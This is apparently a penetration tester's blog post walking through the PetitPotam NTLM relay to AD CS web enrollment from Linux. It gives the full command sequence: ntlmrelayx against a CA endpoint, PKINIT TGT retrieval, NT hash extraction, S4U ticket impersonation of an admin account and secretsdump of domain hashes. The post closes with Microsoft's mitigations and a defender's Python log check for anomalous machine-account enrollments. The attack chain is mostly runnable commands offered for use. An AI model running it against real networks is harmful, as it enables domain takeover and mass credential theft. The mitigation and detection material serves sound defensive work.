The ultimate tag team: PetitPotam and ADCS pwnage from Linux
Go from network access to DA ;-)
PetitPotam and ADCS exploitation are nothing short of amazing. Exploitation is a breeze and results in full domain admin access.
With these two TTPs, an attacker can hop on a network, exploit the vulnerability, do some command-line magic and have local administrator privileges on a domain controller in under 15 minutes. So far, no one has detailed the exploitation process fully on Linux, and that’s what we’re going to do today.
Detecting the Vulnerability
Collect the following information to exploit this vulnerability:
- A list of domain controllers on the network (see: How to identify Domain Controllers on the network)
- The company CA server and its web enrollment endpoints
Once you have the above information, first test that one of the domain controllers is vulnerable to PetitPotam:
If it is, awesome. Let’s push on to next steps.
Getting impacket
Once the vulnerability is confirmed, clone ExAndroidDev’s fork of Impacket and switch to the correct branch:
git clone https://github.com/ExAndroidDev/impacket && \
cd impacket && \
git checkout ntlmrelayx-adcs-attack && \
pipenv --python 3 shell
Once in the virtual environment with the correct branch, install Impacket:
python3 setup.py install
Getting ntlmrelayx up and running
You can now execute the following command to start listening for inbound authentication attempts from the domain controller targeted with PetitPotam:
python3 examples/ntlmrelayx.py -debug -smb2support --target http://10.196.1.20/certsrv/default.asp --template DomainController --adcs
Hit enter and you should see something similar to this:
Getting the PFX
Execute PetitPotam again. ntlmrelayx will receive the inbound authentication from the domain controller, relay it to the CA web enrollment endpoint, and print a base64-encoded PFX blob:
Copy the base64 output to a file for later use.
Installing PKINITtools
We now need to clone and install dirkjanm’s PKINITtools:
git clone https://github.com/dirkjanm/PKINITtools && \
cd PKINITtools && \
pipenv --python 3 shell
After the python virtual environment is initialized, execute the following command to install the required packages:
pip3 install -r requirements.txt
Decoding the certificate
Using the Base64 blob you wrote to a file, decode its contents and write it to a separate file using a command similar to the one below:
cat crt.pfx.b64 | base64 -d > crt.pfx
We have to do this by hand, even though dirkjanm’s tooling appears to support Base64 PFX files. That’s because we had issues with the functionality while using gettgtpkinit.py. It may work for you, though. Try it out.
Using gettgtpkinit.py
Using the dirkjanm tool gettgtpkinit.py, get your TGT:
python3 gettgtpkinit.py acme.org/DC01\$ -cert-pfx crt.pfx out.ccache
You need the following for the command to work:
- The internal domain name (acme.org)
- The hostname of the DC you triggered authentication with using PetitPotam. Don’t forget to escape the $ with a backslash
- Decoded version of the Base64 PFX you just generated with ntlmrelayx
After running the command above, you’ll see output similar to what is shown below; the TGT is also written to the ccache file you specified:
Getting the NT hash
Save this output and ccache file. We’ll use it to access the domain controller we attacked. Execute the following command to get the NT hash for the domain controller:
KRB5CCNAME=out.ccache python3 getnthash.py acme.org/DC01\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773
You need the following for the command to work:
- The internal domain name (acme.org)
- The hostname of the DC you triggered authentication with using PetitPotam. Don’t forget to escape the $
- The generated AS-REP key you got from gettgtpkinit.py
- The generated TGT ccache file you got from gettgtpkinit.py
After you hit enter, you’ll pull the NT hash for the target domain controller:
This is awesome because we can now authenticate to the domain, but we still want to be able to impersonate domain administrators and perform other attacks. Let’s get a silver ticket.
Finding a user to impersonate
First, let’s grab a list of administrator users using the hash above and crackmapexec:
crackmapexec ldap DC01.acme.org -u DC01\$ -H 2cf2e96d892263276b95861017e2ce27 --admin-count
You need the following for the command to work:
- The NT hash you just extracted
- The hostname of the domain controller you’re targeting
- Crackmapexec installed
Following the execution of this command, you’ll now have a list of users and groups with administrative permissions in the domain. One of the accounts in our output is listed below:
- VeeamBackup
Silver Surfing
This user most likely has local administrator access to the domain controllers and all other servers on the network. Let’s get a silver ticket for this user and start authenticating to services.
dirkjanm’s command for doing this is quite long, so I’ve included it below for easy copy and paste:
KRB5CCNAME=out.ccache python3 gets4uticket.py kerberos+ccache://acme.org\\DC01\$:out.ccache@DC01.acme.org cifs/DC01.acme.org@acme.org VeeamBackup@acme.org VeeamBackup.ccache -v
Note that you need the following for the command to work:
- The hostname of the domain controller you’re targeting
- The generated ccache file you got from gettgtpkinit.py
- A user to target and pull a silver ticket for
- The internal domain name
Getting everything
After executing this command, you’ll have a ccache file for the account VeeamBackup. You can use that ccache file to authenticate to the same domain controller as a local administrator. For example, you can now execute secretsdump:
KRB5CCNAME=VeeamBackup.ccache python3 examples/secretsdump.py -just-dc-ntlm -user-status -debug -k acme.org/VeeamBackup@DC01.acme.org -no-pass -outputfile DC01.acme.org.secretsdump
Wrap up
When this is all said and done, you get domain admin in 20 minutes or less. This is beyond devastating and honestly the biggest exploitation path since ETERNALBLUE in our opinion.
We’ve already used this TTP on engagements, and I can tell you right now, it basically feels like cheating.
Make sure to use this article to exploit and report on these vulnerabilities as soon as possible. Let your customers know the risk and ensure they understand the speed with which you were able to take over their network.
To mitigate these vulnerabilities, instate the following controls:
- Implement LDAP signing and channel binding wherever possible
- Enable EPA for Certificate Authority Web Enrollment in IIS on internal certificate authority servers
- Enable EPA for Certificate Enrollment Web Service in IIS on internal certificate authority servers
- Disable NTLM authentication on your Windows domain controllers (pipe dream, we know)
- Disable NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the “Certificate Authority Web Enrollment” or “Certificate Enrollment Web Service” services.
These recommendations come from Microsoft and will stop this attack dead in its tracks.
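Alongside the controls above, the relay leaves a trace on the CA side: the IIS logs of the web enrollment site show a domain controller’s machine account authenticating to /certsrv/ from an address that is not the DC. The following Python check is an added example for defenders, not code from the original post or from any of the projects referenced; the log excerpt is constructed, and the host-to-address inventory (KNOWN_HOSTS) is an assumption you would replace with your own asset data.

```python
from ipaddress import ip_address

# Constructed IIS W3C log excerpt from a CA web-enrollment site (not real data).
# The DC01$ entry comes from 10.196.1.77, while the DC itself lives at 10.196.1.10.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-08-02 14:01:07 10.196.1.20 GET /certsrv/default.asp - 80 - 10.196.1.77 Mozilla/5.0 401
2021-08-02 14:01:08 10.196.1.20 GET /certsrv/certfnsh.asp - 80 ACME\\DC01$ 10.196.1.77 Mozilla/5.0 200
2021-08-02 14:05:12 10.196.1.20 POST /certsrv/certfnsh.asp - 80 ACME\\WS042$ 10.196.2.42 Mozilla/5.0 200
2021-08-02 14:09:30 10.196.1.20 GET /certsrv/certrqxt.asp - 80 ACME\\jsmith 10.196.2.15 Mozilla/5.0 200
"""

# Assumed inventory: machine account -> address it legitimately enrolls from (constructed).
KNOWN_HOSTS = {"ACME\\DC01$": "10.196.1.10", "ACME\\WS042$": "10.196.2.42"}


def parse_w3c(text):
    """Yield one dict per record, using the column names from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def suspicious_enrollments(text, known_hosts):
    """Return (timestamp, account, source ip, expected ip) for machine-account
    authentications to /certsrv/ that do not originate from the host's own address."""
    hits = []
    for rec in parse_w3c(text):
        user = rec.get("cs-username", "-")
        # Only authenticated machine accounts (name ends in $) hitting web enrollment matter here.
        if not rec["cs-uri-stem"].lower().startswith("/certsrv/") or not user.endswith("$"):
            continue
        expected = known_hosts.get(user)
        if expected is None or ip_address(rec["c-ip"]) != ip_address(expected):
            hits.append((rec["date"] + " " + rec["time"], user, rec["c-ip"], expected))
    return hits


if __name__ == "__main__":
    for when, account, src, expected in suspicious_enrollments(SAMPLE_LOG, KNOWN_HOSTS):
        print(f"{when} {account} enrolled from {src}, expected {expected or 'unknown host'}")
```

Sustained 401 responses to /certsrv/ followed by a 200 for a `$` account are the same pattern seen from the other direction; feed the real logs through the same function once EPA and NTLM restrictions are in place to confirm the path is closed.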
Shout-outs and references
A lot of this article was cribbed from the work done by dirkjanm. See more in the article below:
NTLM relaying to AD CS - On certificates, printers and a little hippo
https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
ExAndroidDev’s fork of Impacket is a pivotal part of this attack, and they laid the groundwork for most of the ADCS exploitation paths out now:
AD CS relay attack - practical guide
https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/
Remediation recommendations are taken straight from the horse’s mouth (Microsoft):
KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)
https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429
Of course we can’t forget the work from SpectreOps on ADCS:
Certified Pre-Owned
https://posts.specterops.io/certified-pre-owned-d95910965cd2